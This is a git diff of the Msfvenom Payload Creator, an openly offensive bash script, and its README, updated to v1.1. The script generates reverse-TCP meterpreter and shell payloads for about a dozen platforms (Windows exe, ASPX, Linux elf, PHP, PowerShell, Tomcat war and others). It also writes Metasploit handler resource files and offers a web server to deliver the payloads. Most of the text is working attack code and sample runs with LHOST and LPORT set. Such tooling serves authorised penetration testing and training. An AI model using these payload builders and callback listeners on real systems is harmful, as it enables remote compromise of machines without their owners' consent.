diff --git a/README.md b/README.md index 88ccafa..f5ecf42 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ A **quick** way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework). -![Msfvenom Payload Creator (MPC)](https://i.imgur.com/KjlZjd9.png) +![Msfvenom Payload Creator (MPC)](https://i.imgur.com/HfNQ4pr.png) - - - @@ -8,7 +8,7 @@ A **quick** way to generate various "basic" Meterpreter payloads via msfvenom (p Msfvenom Payload Creator (MPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as **simple as possible** (**only requiring one input**) to produce their payload. -**Fully automating** Msfvenom & Metasploit is the end goal _(well as to be be able to automate MPC itself)_. +**Fully automating** msfvenom & Metasploit is the end goal _(well as to be be able to automate MPC itself)_. The rest is to make the user's life as **easy as possible** (e.g. **IP selection menu**, **msfconsole resource file/commands** and a **quick web server** etc). The only necessary input from the user should be **defining the payload** they want by either the **platform** (e.g. `windows`), or the **file extension** they wish the payload to have (e.g. `exe`). @@ -28,71 +28,87 @@ mpc ## Help ``` bash -root@kali:/var/www# bash /root/mpc.sh - [*] Msfvenom Payload Creator (MPC) +root@kali:~# mpc + [*] Msfvenom Payload Creator (MPC v1.1) - [i] Missing type - - [i] /root/mpc.sh () () - [i] TYPE: + [i] ./mpc.sh () () + [i] : (All reverse TCP payloads) [i] + ASP (meterpreter) - [i] + Bash (meterpreter) - [i] + Linux (meterpreter) + [i] + ASPX (meterpreter) + [i] + Bash [.sh] (shell) + [i] + Java [.jsp] (shell) + [i] + Linux [.elf] (meterpreter) + [i] + OSX [.macho] (shell) + [i] + Perl [.pl] (shell) [i] + PHP (meterpreter) - [i] + Python (meterpreter) - [i] + Windows (meterpreter) - [i] IP will default to IP selection menu - [i] PORT will default to 443 + [i] + Powershell [.ps1] (meterpreter) + [i] + Python [.py] (meterpreter) + [i] + Tomcat [.war] (shell) + [i] + Windows [.exe] (meterpreter) + [i] Missing will default to IP menu + [i] Missing will default to 443 +root@kali:~# +``` + +## Example \#1 (Linux - Fully Automated With IP And Port) + +```bash +root@kali:/var/www# bash mpc.sh linux 192.168.155.175 4444 + [*] Msfvenom Payload Creator (MPC v1.1) + [i] IP: 192.168.155.175 + [i] PORT: 4444 + [i] TYPE: linux (linux/x86/meterpreter/reverse_tcp) + [i] CMD: msfvenom -p linux/x86/meterpreter/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=192.168.155.175 LPORT=4444 -o /root/linux-meterpreter.elf + [i] linux meterpreter created: '/root/linux-meterpreter.elf' + [i] MSF handler file: '/root/linux-meterpreter-elf.rc' (msfconsole -q -r /root/linux-meterpreter-elf.rc) + [?] Quick web server? python -m SimpleHTTPServer 8080 + [*] Done! root@kali:/var/www# ``` -## Example \#1 (PHP - Fully Automated) +## Example \#2 (Windows - Fully Automated With Interface) ```bash -root@kali:/var/www# bash /root/mpc.sh php 127.0.0.1 - [*] Msfvenom Payload Creator (MPC) - [i] IP: 127.0.0.1 +root@kali:~# ./mpc.sh exe eth0 + [*] Msfvenom Payload Creator (MPC v1.1) + [i] IP: 192.168.103.241 [i] PORT: 443 - [i] TYPE: PHP (php/meterpreter_reverse_tcp) - [i] CMD: msfvenom --payload php/meterpreter_reverse_tcp --format raw --platform php --arch php LHOST=127.0.0.1 LPORT=443 -o /var/www/php_meterpreter.php -No encoder or badchars specified, outputting raw payload -Saved as: /var/www/php_meterpreter.php - [i] PHP meterpreter created as '/var/www/php_meterpreter.php' - [i] MSF handler file create as 'php_meterpreter.rc (msfconsole -q -r /var/www/php_meterpreter.rc)' + [i] TYPE: windows (windows/meterpreter/reverse_tcp) + [i] CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.103.241 LPORT=443 -o /root/windows-meterpreter.exe + [i] windows meterpreter created: '/root/windows-meterpreter.exe' + [i] MSF handler file: '/root/windows-meterpreter-exe.rc' (msfconsole -q -r /root/windows-meterpreter-exe.rc) [?] Quick web server? python -m SimpleHTTPServer 8080 [*] Done! -root@kali:/var/www# +root@kali:~# ``` -## Example \#2 (Windows - Interactive) +## Example \#3 (PHP - Interactive) ```bash -root@kali:/var/www# bash /root/mpc.sh exe - [*] Msfvenom Payload Creator (MPC) +root@kali:~# bash mpc.sh php + [*] Msfvenom Payload Creator (MPC v1.1) - [i] Use which IP address?: - [i] 1.) 192.168.103.136 - [i] 2.) 192.168.155.175 - [i] 3.) 127.0.0.1 - [?] Select 1-3: 2 + [i] Use which interface/IP address?: + [i] 1.) eth0 - 192.168.103.140 + [i] 2.) eth1 - 192.168.155.175 + [i] 3.) lo - 127.0.0.1 + [?] Select 1-3, interface or IP address: 2 [i] IP: 192.168.155.175 [i] PORT: 443 - [i] TYPE: Windows (windows/meterpreter/reverse_tcp) - [i] CMD: msfvenom --payload windows/meterpreter/reverse_tcp --format exe --platform windows --arch x86 LHOST=192.168.155.175 LPORT=443 -o /var/www/windows_meterpreter.exe -No encoder or badchars specified, outputting raw payload -Saved as: /var/www/windows_meterpreter.exe - [i] Windows meterpreter created as '/var/www/windows_meterpreter.exe' - [i] MSF handler file create as 'windows_meterpreter.rc (msfconsole -q -r /var/www/windows_meterpreter.rc)' + [i] TYPE: php (php/meterpreter/reverse_tcp) + [i] CMD: msfvenom -p php/meterpreter/reverse_tcp -f raw --platform php -e generic/none -a php LHOST=192.168.155.175 LPORT=443 -o /root/php-meterpreter.php + [i] php meterpreter created: '/root/php-meterpreter.php' + [i] MSF handler file: '/root/php-meterpreter-php.rc' (msfconsole -q -r /root/php-meterpreter-php.rc) [?] Quick web server? python -m SimpleHTTPServer 8080 [*] Done! -root@kali:/var/www# +root@kali:~# ``` ## To-Do List -* Display interface name next to IP address (e.g. `2.) 192.168.155.175 [eth1]`) -* Display file stats (e.g. file, size, md5/sha1) _Commands are in, just commented out._ * Cleaner command line arguments (e.g. `-ip 127.0.0.1`, `-v` etc) +* Display file stats (e.g. file, size, md5/sha1) _Commands are in, just commented out._ * Support different payloads (e.g. `standard shells`/`nc` & `reverse_http`/`reverse_https`, `bind` etc) * x64 payloads +* _...IPv6 support?_ diff --git a/mpc.sh b/mpc.sh index 19a2c37..a8fc65f 100755 --- a/mpc.sh +++ b/mpc.sh @@ -1,38 +1,57 @@ #!/bin/bash #-Metadata----------------------------------------------------# -# Filename: mpc.sh (Update: 2015-06-22) # +# Filename: mpc.sh (v1.1) (Update: 2015-06-24) # #-Info--------------------------------------------------------# # Quickly generate Metasploit payloads using msfvenom. # #-Author(s)---------------------------------------------------# # g0tmilk ~ https://blog.g0tmi1k.com/ # #-Operating System--------------------------------------------# -# Designed for: Kali Linux & Metasploit v4.11+ # +# Designed for & tested on: Kali Linux & Metasploit v4.11+ # #-Licence-----------------------------------------------------# # MIT License ~ http://opensource.org/licenses/MIT # #-Notes-------------------------------------------------------# +# Commands: # +# msfvenom --list payloads # +# msfvenom --help-formats # # --- # +# Payload names: # +# shell_bind_tcp - Single / Inline / Non Staged   # +# shell/bind_tcp - Staged (Requires Metasploit)   # +#-More information--------------------------------------------# +# - https://www.offensive-security.com/metasploit-unleashed/payloads/ +# - https://www.offensive-security.com/metasploit-unleashed/payload-types/ +# - https://www.offensive-security.com/metasploit-unleashed/msfvenom/ +# - https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads +# - https://community.rapid7.com/community/metasploit/blog/2011/05/24/introducing-msfvenom +# - https://community.rapid7.com/community/metasploit/blog/2014/12/09/good-bye-msfpayload-and-msfencode +# - https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom +#--Install----------------------------------------------------# +# curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc +# chmod +x /usr/bin/mpc #-------------------------------------------------------------# #-Defaults-------------------------------------------------------------# -outputPath="$(pwd)/" # ./ /var/www/ /tmp/ +##### Variables +OUTPATH="$(pwd)/" # ./ /var/www/ /tmp/ ##### (Cosmetic) Colour output -RED="\033[01;31m" -GREEN="\033[01;32m" -YELLOW="\033[01;33m" -BLUE="\033[01;34m" -RESET="\033[00m" +RED="\033[01;31m" # Issues/Errors +GREEN="\033[01;32m" # Success/Asking for Input +YELLOW="\033[01;33m" # Warnings/Information +BLUE="\033[01;34m" # Heading +RESET="\033[00m" # Normal ##### Read command line arguments -TYPE="$(echo ${1} | tr '[:upper:]' '[:lower:]')" +TYPE="$(echo ${1} | \tr '[:upper:]' '[:lower:]')" IP="${2}" PORT="${3}" -[[ -z "${IP}" ]] && IP=( $(ifconfig | grep inet | \grep -E '([[:digit:]]{1,2}.){4}' | sed 's/://g; s/inet//g; s/addr//g; s/^[ \t]*//' | cut -d ' ' -f1) ) -[[ -z "${PORT}" ]] && PORT="443" + +##### Default value SUCCESS=false +DOMAIN=false ##### (Optional) Enable debug mode? #set -x @@ -40,7 +59,7 @@ SUCCESS=false #-Function-------------------------------------------------------------# -## doAction TYPE IP PORT PAYLOAD CMD FILEEXT +## doAction TYPE IP PORT PAYLOAD CMD FILEEXT SHELL function doAction { TYPE="${1}" IP="${2}" @@ -48,39 +67,51 @@ function doAction { PAYLOAD="${4}" CMD="${5}" FILEEXT="${6}" + SHELL="${7}" + + if [[ -z "${SHELL}" ]]; then + echo -e " ${YELLOW}[i]${RESET} ${RED}Something went wrong (Internally)${RESET}. doAction TYPE($TYPE) IP($IP) PORT($PORT) PAYLOAD($PAYLOAD) CMD($CMD) FILEEXT($FILEEXT) SHELL($SHELL)" >&2 + exit 2 + fi + + FILENAME="${OUTPATH}$(echo ${TYPE}-${SHELL}.${FILEEXT} | \tr '[:upper:]' '[:lower:]')" + FILEHANDLE="${OUTPATH}$(echo ${TYPE}-${SHELL}-${FILEEXT}.rc | \tr '[:upper:]' '[:lower:]')" - FILENAME="$(echo ${TYPE}_meterpreter.${FILEEXT} | tr '[:upper:]' '[:lower:]')" - FILEHANDLE="$(echo ${TYPE}_meterpreter.rc | tr '[:upper:]' '[:lower:]')" + X=" IP" + [[ "${DOMAIN}" == "true" ]] && X='NAME' - echo -e " ${YELLOW}[i]${RESET} IP: ${YELLOW}${IP}${RESET}" + echo -e " ${YELLOW}[i]${RESET} ${X}: ${YELLOW}${IP}${RESET}" echo -e " ${YELLOW}[i]${RESET} PORT: ${YELLOW}${PORT}${RESET}" echo -e " ${YELLOW}[i]${RESET} TYPE: ${YELLOW}${TYPE}${RESET} (${PAYLOAD})" echo -e " ${YELLOW}[i]${RESET} CMD: ${YELLOW}${CMD}${RESET}" [[ -e "${FILENAME}" ]] && echo -e " ${YELLOW}[i]${RESET} File (${FILENAME}) ${YELLOW}already exists${RESET}. Overwriting..." - eval "${CMD}" + eval "${CMD}" 2>/dev/null + if [[ -e "${FILENAME}" ]]; then + echo -e " ${YELLOW}[i]${RESET} ${TYPE} ${SHELL} created: '${YELLOW}${FILENAME}${RESET}'" + else + echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Issue creating file${RESET}. =(" >&2 + exit 2 + fi - #echo -e " ${YELLOW}[i]${RESET} File: $(file -b ${FILENAME})" - #echo -e " ${YELLOW}[i]${RESET} Size: $(du -h ${FILENAME} | cut -f1)" - #echo -e " ${YELLOW}[i]${RESET} MD5: $(md5sum ${FILENAME} | awk '{print $1}')" - #echo -e " ${YELLOW}[i]${RESET} SHA1: $(sha1sum ${FILENAME} | awk '{print $1}')" + #echo -e " ${YELLOW}[i]${RESET} File: $(\file -b ${FILENAME})" + #echo -e " ${YELLOW}[i]${RESET} Size: $(\du -h ${FILENAME} | \cut -f1)" + #echo -e " ${YELLOW}[i]${RESET} MD5: $(\openssl md5 ${FILENAME} | \awk '{print $2}')" + #echo -e " ${YELLOW}[i]${RESET} SHA1: $(\openssl sha1 ${FILENAME} | \awk '{print $2}')" cat < "${FILEHANDLE}" # # RUN: service postgresql start; service metasploit start; msfconsole -q -r "${FILENAME}" # -setg TimestampOutput true -setg VERBOSE true use exploit/multi/handler set PAYLOAD ${PAYLOAD} set LHOST ${IP} set LPORT ${PORT} -set AutoRunScript "migrate -f" +#set AutoRunScript "migrate -f -k" set ExitOnSession false -exploit -j -z +run -j EOF - echo -e " ${YELLOW}[i]${RESET} ${TYPE} meterpreter created as '${YELLOW}${outputPath}${FILENAME}${RESET}'" - echo -e " ${YELLOW}[i]${RESET} MSF handler file create as '${YELLOW}${FILEHANDLE}${RESET} (msfconsole -q -r $(pwd)/${FILEHANDLE})'" + echo -e " ${YELLOW}[i]${RESET} MSF handler file: '${YELLOW}${FILEHANDLE}${RESET}' (msfconsole -q -r ${FILEHANDLE})" SUCCESS=true return } @@ -90,20 +121,89 @@ EOF ## Banner -echo -e " ${BLUE}[*]${RESET} ${BLUE}M${RESET}sfvenom ${BLUE}P${RESET}ayload ${BLUE}C${RESET}reator (${BLUE}MPC${RESET})" +echo -e " ${BLUE}[*]${RESET} ${BLUE}M${RESET}sfvenom ${BLUE}P${RESET}ayload ${BLUE}C${RESET}reator (${BLUE}MPC${RESET} v${BLUE}1.1${RESET})" + + +## Check system +## msfvenom installed? +if [[ ! -n "$(\which msfvenom)" ]]; then + echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${YELLOW}Couldn't find msfvenom${RESET}" >&2 + exit 3 +fi + +## Are we using Linux? (Sorry OSX users) +if [[ "$(\uname)" != "Linux" ]]; then + echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${YELLOW}You're not using Linux${RESET}" >&2 + exit 3 +fi + +## Is there a writeable path for us? +if [[ ! -d "${OUTPATH}" ]]; then + echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${YELLOW}Unable to use ${OUTPATH}${RESET}" >&2 + exit 3 +fi + + +## Set & get default values +[[ -z "${PORT}" ]] && PORT="443" +IFACE=( $(\awk '/:/ {print $1}' /proc/net/dev | \sed 's_:__') ) +IPs=( $(\ifconfig | \grep 'inet addr:' | \cut -d':' -f2 | \cut -d' ' -f1) ) # OSX -> \ifconfig | \grep inet | \grep -E '([[:digit:]]{1,2}.){4}' | \sed -e 's_[:|addr|inet]__g; s_^[ \t]*__' | \awk '{print $1}' + + +## Check user input +## Able to detect NIC interfaces? +if [[ "${IFACE}" == "" ]]; then + echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${YELLOW}Couldn't find any network interfaces${RESET}" >&2 + echo -e " ${YELLOW}[i]${RESET} Need to manually define an IP. ${YELLOW}${0} ${TYPE} ${RESET}" >&2 + exit 2 +fi + +## Able to detect IP addresses? +if [[ "${IPs}" == "" ]]; then + echo -e " ${YELLOW}[i]${RESET} Something went wrong. ${RED}Couldn't discover IP addresses${RESET}. =(" >&2 + echo -e " ${YELLOW}[i]${RESET} Need to manually define it. ${YELLOW}${0} ${TYPE} ${RESET}" >&2 + exit 2 +fi + +## Did user enter an interface instead of an IP address? +for (( x=0; x<${#IFACE[@]}; ++x )); do [[ "${IP}" == "${IFACE[${x}]}" ]] && IP=${IPs[${x}]} && break; done + +## Valued entered for IP address? Is it a valid IPv4 address? Else assume its a domain... +if [[ "${IP}" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]]; then + for (( i=1; i<${#BASH_REMATCH[@]}; ++i )); do + (( ${BASH_REMATCH[$i]} <= 255 )) || { echo -e " ${YELLOW}[i]${RESET} IP (${IP}) appears to be a ${RED}invalid IPv4 address${RESET} =(" >&2 && exit 3; } + done +elif [[ "${IP}" != "" ]]; then + echo -e " ${YELLOW}[i]${RESET} ${IP} isn't a IPv4 address. ${YELLOW}Assuming its a domain name${RESET}..." + DOMAIN=true +fi + +## Valid port? +if [[ "${PORT}" -lt 1 || "${PORT}" -gt 65535 ]]; then + echo -e " ${YELLOW}[i]${RESET} PORT (${PORT}) is incorrect. Needs to be ${YELLOW}between 1-65535${RESET}" >&2 + exit 3 +fi + +## IP menu +if [[ -n "${TYPE}" && -z "${IP}" ]]; then + echo -e "\n ${YELLOW}[i]${RESET} Use which ${BLUE}interface${RESET}/${YELLOW}IP address${RESET}?:" + I=0 + for iface in "${IFACE[@]}"; do + IPs[${I}]=$(\ifconfig ${iface} | \grep 'inet addr:' | \cut -d':' -f2 | \cut -d' ' -f1 | sort) + [[ "${IPs[${I}]}" == "" ]] && IPs[${I}]="UNKNOWN" + echo -e " ${YELLOW}[i]${RESET} ${GREEN}$[${I}+1]${RESET}.) ${BLUE}${iface}${RESET} - ${YELLOW}${IPs[${I}]}${RESET}" -## IP selection menu -if [[ -n "${1}" ]] && [[ -z "${2}" ]]; then - echo -e "\n ${YELLOW}[i]${RESET} Use which ${YELLOW}IP address${RESET}?:" - _I=0 - for ip in "${IP[@]}"; do - _I=$[${_I} +1] - echo -e " ${YELLOW}[i]${RESET} ${GREEN}${_I}${RESET}.) ${ip}" + I=$[${I}+1] done - while true; do - echo -ne " ${YELLOW}[?]${RESET} ${GREEN}Select${RESET} 1-${#IP[@]}"; read -p ": " INPUT - [[ "${INPUT}" -ge 1 ]] && [[ "${INPUT}" -le "${#IP[@]}" ]] && IP=${IP[${INPUT}-1]} && break + _IP="" + while [[ "${_IP}" == "" ]]; do + echo -ne " ${YELLOW}[?]${RESET} ${GREEN}Select${RESET} 1-${I}, ${BLUE}interface${RESET} or ${YELLOW}IP address${RESET}"; read -p ": " INPUT + for (( x=0; x<${#IFACE[@]}; ++x )); do [[ "${INPUT}" == "${IFACE[${x}]}" ]] && _IP=${IPs[${x}]}; done # Did user enter interface? + [[ "${INPUT}" != *"."* && "${INPUT}" -ge 1 && "${INPUT}" -le "${I}" ]] && _IP=${IPs[${INPUT}-1]} # Did user select number? + #for ip in "${IPs[@]}"; do [[ "${INPUT}" == "${ip}" ]] && _IP=${ip}; done # Did user enter a known IP? + [[ "${INPUT}" =~ ^([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})[.]([0-9]{1,3})$ ]] && _IP=${INPUT} # Did the user enter a IP address (doesn't valid it) + IP=${_IP} done echo "" fi @@ -112,64 +212,130 @@ fi if [[ "${TYPE}" == "asp" ]]; then TYPE="windows" FILEEXT="asp" - PAYLOAD="${TYPE}/meterpreter/reverse_tcp" - CMD="msfvenom --payload ${PAYLOAD} --format asp --platform ${TYPE} --arch x86 LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}" - doAction "ASP" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" + SHELL="meterpreter" + PAYLOAD="${TYPE}/${SHELL}/reverse_tcp" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${SHELL}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" +## ASPX +elif [[ "${TYPE}" == "aspx" ]]; then + TYPE="windows" + FILEEXT="aspx" + SHELL="meterpreter" + PAYLOAD="${TYPE}/${SHELL}/reverse_tcp" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${SHELL}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" ## Bash -elif [[ "${TYPE}" == "bash" ]] || [[ "${TYPE}" == "sh" ]]; then +elif [[ "${TYPE}" == "bash" || "${TYPE}" == "sh" ]]; then TYPE="bash" FILEEXT=".sh" + SHELL="shell" PAYLOAD="cmd/unix/reverse_bash" - CMD="msfvenom --payload ${PAYLOAD} --format raw --platform ${TYPE} --arch ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}" - doAction "PHP" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" + CMD="msfvenom -p ${PAYLOAD} -f raw --platform ${TYPE} -e generic/none -a ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${SHELL}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" +## Java +elif [[ "${TYPE}" == "java" || "${TYPE}" == "jsp" ]]; then + TYPE="java" + FILEEXT="jsp" + SHELL="shell" + PAYLOAD="java/jsp_shell_reverse_tcp" + CMD="msfvenom -p ${PAYLOAD} -f raw --platform ${TYPE} -e generic/none -a ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${SHELL}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" ## Linux -elif [[ "${TYPE}" == "linux" ]] || [[ "${TYPE}" == "lin" ]] || [[ "${TYPE}" == "elf" ]]; then +elif [[ "${TYPE}" == "linux" || "${TYPE}" == "lin" || "${TYPE}" == "elf" ]]; then + TYPE="linux" + FILEEXT="elf" #bin + SHELL="meterpreter" + PAYLOAD="${TYPE}/x86/${SHELL}/reverse_tcp" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${SHELL}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" +## OSX +elif [[ "${TYPE}" == "osx" || "${TYPE}" == "macho" ]]; then + TYPE="osx" + FILEEXT="macho" + SHELL="shell" + PAYLOAD="osx/x86/shell_reverse_tcp" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${SHELL}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" +## Perl +elif [[ "${TYPE}" == "perl" || "${TYPE}" == "pl" ]]; then TYPE="linux" - FILEEXT="bin" - PAYLOAD="${TYPE}/x86/meterpreter/reverse_tcp" - CMD="msfvenom --payload ${PAYLOAD} --format elf --platform ${TYPE} --arch x86 LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}" - doAction "Linux" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" + FILEEXT="pl" + SHELL="shell" + PAYLOAD="cmd/unix/reverse_perl" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${SHELL}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" ## PHP elif [[ "${TYPE}" == "php" ]]; then TYPE="php" FILEEXT="php" - PAYLOAD="${TYPE}/meterpreter_reverse_tcp" - CMD="msfvenom --payload ${PAYLOAD} --format raw --platform ${TYPE} --arch ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}" - doAction "PHP" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" + SHELL="meterpreter" + PAYLOAD="${TYPE}/${SHELL}/reverse_tcp" + CMD="msfvenom -p ${PAYLOAD} -f raw --platform ${TYPE} -e generic/none -a ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${SHELL}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" +## Powersehll +elif [[ "${TYPE}" == "powershell" || "${TYPE}" == "ps1" ]]; then + TYPE="windows" + FILEEXT="ps1" + SHELL="meterpreter" + PAYLOAD="${TYPE}/${SHELL}/reverse_tcp" + CMD="msfvenom -p ${PAYLOAD} -f ps1 --platform ${TYPE} -e generic/none -a x86 LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${SHELL}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" ## Python -elif [[ "${TYPE}" == "python" ]] || [[ "${TYPE}" == "py" ]]; then +elif [[ "${TYPE}" == "python" || "${TYPE}" == "py" ]]; then TYPE="python" FILEEXT="py" - PAYLOAD="${TYPE}/meterpreter/reverse_tcp" - CMD="msfvenom --payload ${PAYLOAD} --format raw --platform ${TYPE} --arch ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}" - doAction "Python" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" + SHELL="meterpreter" + PAYLOAD="${TYPE}/${SHELL}/reverse_tcp" + CMD="msfvenom -p ${PAYLOAD} -f raw --platform ${TYPE} -e generic/none -a ${TYPE} LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${SHELL}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" +## Tomcat +elif [[ "${TYPE}" == "tomcat" || "${TYPE}" == "war" ]]; then + TYPE="tomcat" + FILEEXT="war" + SHELL="shell" + PAYLOAD="java/shell_reverse_tcp" + CMD="msfvenom -p ${PAYLOAD} -f raw --platform java -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${SHELL}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" ## Windows -elif [[ "${TYPE}" == "windows" ]] || [[ "${TYPE}" == "win" ]] || [[ "${TYPE}" == "exe" ]]; then +elif [[ "${TYPE}" == "windows" || "${TYPE}" == "win" || "${TYPE}" == "exe" ]]; then TYPE="windows" FILEEXT="exe" - PAYLOAD="${TYPE}/meterpreter/reverse_tcp" - CMD="msfvenom --payload ${PAYLOAD} --format exe --platform ${TYPE} --arch x86 LHOST=${IP} LPORT=${PORT} -o ${outputPath}${TYPE}_meterpreter.${FILEEXT}" - doAction "Windows" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" + SHELL="meterpreter" + PAYLOAD="${TYPE}/${SHELL}/reverse_tcp" + CMD="msfvenom -p ${PAYLOAD} -f ${FILEEXT} --platform ${TYPE} -a x86 -e generic/none LHOST=${IP} LPORT=${PORT} -o ${OUTPATH}${TYPE}-${SHELL}.${FILEEXT}" + doAction "${TYPE}" "${IP}" "${PORT}" "${PAYLOAD}" "${CMD}" "${FILEEXT}" "${SHELL}" elif [[ -z "${TYPE}" ]]; then - echo -e "\n ${YELLOW}[i]${RESET} ${YELLOW}Missing type${RESET}" + #echo -e "\n ${YELLOW}[i]${RESET} ${YELLOW}Missing type${RESET}" + true else - echo -e "\n ${YELLOW}[i]${RESET} Unknown type: ${YELLOW}${TYPE}${RESET}" + echo -e "\n ${YELLOW}[i]${RESET} Unknown type: ${YELLOW}${TYPE}${RESET}" >&2 fi + +#-Done-----------------------------------------------------------------# + + +##### Done! if [[ "$SUCCESS" = true ]]; then echo -e " ${GREEN}[?]${RESET} Quick ${GREEN}web server${RESET}? python -m SimpleHTTPServer 8080" echo -e " ${BLUE}[*]${RESET} ${BLUE}Done${RESET}!" exit 0 else - echo -e "\n ${YELLOW}[i]${RESET} ${BLUE}${0}${RESET} () ()" - echo -e " ${YELLOW}[i]${RESET} TYPE:" + echo -e "\n ${YELLOW}[i]${RESET} ${BLUE}${0}${RESET} () ()" + echo -e " ${YELLOW}[i]${RESET} : (All reverse TCP payloads)" echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}ASP${RESET} (meterpreter)" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Bash${RESET} (meterpreter)" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Linux${RESET} (meterpreter)" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}ASPX${RESET} (meterpreter)" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Bash${RESET} [.${YELLOW}sh${RESET}] (shell)" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Java${RESET} [.${YELLOW}jsp${RESET}] (shell)" #non staged + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Linux${RESET} [.${YELLOW}elf${RESET}] (meterpreter)" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}OSX${RESET} [.${YELLOW}macho${RESET}] (shell)" #non staged + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Perl${RESET} [.${YELLOW}pl${RESET}] (shell)" echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}PHP${RESET} (meterpreter)" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Python${RESET} (meterpreter)" - echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Windows${RESET} (meterpreter)" - echo -e " ${YELLOW}[i]${RESET} IP will default to ${YELLOW}IP selection menu${RESET}" - echo -e " ${YELLOW}[i]${RESET} PORT will default to ${YELLOW}443${RESET}" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Powershell${RESET} [.${YELLOW}ps1${RESET}] (meterpreter)" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Python${RESET} [.${YELLOW}py${RESET}] (meterpreter)" + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Tomcat${RESET} [.${YELLOW}war${RESET}] (shell)" #non staged + echo -e " ${YELLOW}[i]${RESET} + ${YELLOW}Windows${RESET} 